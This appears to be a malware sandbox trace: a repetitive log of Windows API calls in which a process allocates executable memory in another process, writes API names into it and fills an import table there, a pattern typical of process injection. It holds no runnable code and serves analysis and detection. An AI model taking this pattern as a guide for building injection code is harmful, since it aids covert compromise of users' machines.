	[0197.648] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0197.648] ResetEvent (hEvent=0x498) returned 1
	[0197.648] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.648] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.648] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.648] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.648] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.648] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x100ca0f4, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0197.649] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.649] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.649] lstrlenA (lpString="GetProcessHeap") returned 14
	[0197.649] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.649] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x20000, lpBuffer=0x30bc0c4*, nSize=0xf, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x30bc0c4*, lpNumberOfBytesWritten=0x12857c*=0xf) returned 1
	[0197.650] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0197.650] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff4f8
	[0197.650] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0197.650] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0xe0000, lpBuffer=0x22ff4f8*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff4f8*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0197.650] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0197.650] ResetEvent (hEvent=0x498) returned 1
	[0197.650] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.651] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.651] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.651] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.651] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.651] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x100ca0f8, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0197.651] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.652] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.652] lstrlenA (lpString="CreateFileW") returned 11
	[0197.652] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.652] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x20000, lpBuffer=0x30bbecc*, nSize=0xc, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x30bbecc*, lpNumberOfBytesWritten=0x12857c*=0xc) returned 1
	[0197.652] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0197.652] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff4f8
	[0197.652] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0197.652] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0xe0000, lpBuffer=0x22ff4f8*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff4f8*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0197.653] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0197.653] ResetEvent (hEvent=0x498) returned 1
	[0197.653] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.653] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.653] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.654] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.654] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.654] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x100ca0fc, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0197.654] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.654] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.654] lstrlenA (lpString="FreeLibrary") returned 11
	[0197.654] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.654] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x20000, lpBuffer=0x30bc0ee*, nSize=0xc, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x30bc0ee*, lpNumberOfBytesWritten=0x12857c*=0xc) returned 1
	[0197.655] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0197.655] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff4f8
	[0197.655] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0197.655] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0xe0000, lpBuffer=0x22ff4f8*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff4f8*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0197.655] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0197.656] ResetEvent (hEvent=0x498) returned 1
	[0197.656] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.656] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.656] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.656] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.656] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.656] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x100ca100, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0197.657] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.657] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.657] lstrlenA (lpString="WideCharToMultiByte") returned 19
	[0197.657] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.657] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x20000, lpBuffer=0x30bc0fc*, nSize=0x14, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x30bc0fc*, lpNumberOfBytesWritten=0x12857c*=0x14) returned 1
	[0197.657] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0197.657] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff4f8
	[0197.657] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0197.657] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0xe0000, lpBuffer=0x22ff4f8*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff4f8*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0197.658] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0197.658] ResetEvent (hEvent=0x498) returned 1
	[0197.658] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.658] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.658] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.658] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.658] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.658] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x100ca104, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0197.659] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.659] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.659] lstrlenA (lpString="GetSystemTimeAsFileTime") returned 23
	[0197.659] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.659] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x20000, lpBuffer=0x30bc112*, nSize=0x18, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x30bc112*, lpNumberOfBytesWritten=0x12857c*=0x18) returned 1
	[0197.660] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0197.660] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff4f8
	[0197.660] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0197.660] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0xe0000, lpBuffer=0x22ff4f8*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff4f8*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0197.660] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0197.660] ResetEvent (hEvent=0x498) returned 1
	[0197.660] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.661] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.661] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.661] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.661] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.661] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x100ca108, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0197.662] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.662] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.662] lstrlenA (lpString="GetSystemTime") returned 13
	[0197.662] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.662] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x20000, lpBuffer=0x30bc12c*, nSize=0xe, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x30bc12c*, lpNumberOfBytesWritten=0x12857c*=0xe) returned 1
	[0197.662] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0197.662] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff4f8
	[0197.662] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0197.662] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0xe0000, lpBuffer=0x22ff4f8*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff4f8*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0197.663] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0197.663] ResetEvent (hEvent=0x498) returned 1
	[0197.663] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.663] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.663] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.663] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.663] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.664] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x100ca10c, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0197.664] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.664] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.664] lstrlenA (lpString="FormatMessageA") returned 14
	[0197.664] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.664] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x20000, lpBuffer=0x30bc13c*, nSize=0xf, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x30bc13c*, lpNumberOfBytesWritten=0x12857c*=0xf) returned 1
	[0197.665] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0197.665] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff4f8
	[0197.665] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0197.665] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0xe0000, lpBuffer=0x22ff4f8*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff4f8*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0197.665] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0197.665] ResetEvent (hEvent=0x498) returned 1
	[0197.665] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.666] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.666] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.666] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.666] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.666] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x100ca110, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0197.666] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.667] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.667] lstrlenA (lpString="CreateFileMappingW") returned 18
	[0197.667] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x13, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.667] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x20000, lpBuffer=0x30bc14e*, nSize=0x13, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x30bc14e*, lpNumberOfBytesWritten=0x12857c*=0x13) returned 1
	[0197.667] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0197.667] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff4f8
	[0197.667] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0197.667] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0xe0000, lpBuffer=0x22ff4f8*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff4f8*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0197.668] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0197.668] ResetEvent (hEvent=0x498) returned 1
	[0197.668] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.668] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.668] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.668] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.668] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.668] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x100ca114, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0197.669] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.669] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.669] lstrlenA (lpString="MapViewOfFile") returned 13
	[0197.669] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.669] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x20000, lpBuffer=0x30bc164*, nSize=0xe, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x30bc164*, lpNumberOfBytesWritten=0x12857c*=0xe) returned 1
	[0197.670] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0197.670] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff4f8
	[0197.670] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0197.670] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0xe0000, lpBuffer=0x22ff4f8*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff4f8*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0197.670] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0197.670] ResetEvent (hEvent=0x498) returned 1
	[0197.670] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.671] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.671] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.671] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
	[0197.671] VirtualFreeEx (hProcess=0x4a8, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.671] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x100ca118, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0197.672] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0197.672] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0197.672] lstrlenA (lpString="QueryPerformanceCounter") returned 23
	[0197.672] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0197.672] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x20000, lpBuffer=0x30bc174*, nSize=0x18, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x30bc174*, lpNumberOfBytesWritten=0x12857c*=0x18) returned 1
	[0197.672] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0197.672] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff4f8
	[0197.672] VirtualAllocEx (hProcess=0x4a8, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0197.672] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0xe0000, lpBuffer=0x22ff4f8*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff4f8*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0197.673] WriteProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0197.673] ResetEvent (hEvent=0x498) returned 1
	[0197.673] SignalObjectAndWait (hObjectToSignal=0x4cc, hObjectToWaitOn=0x498, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0197.673] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0197.673] VirtualFreeEx (hProcess=0x4a8, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0197.673] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff4f8) returned 1
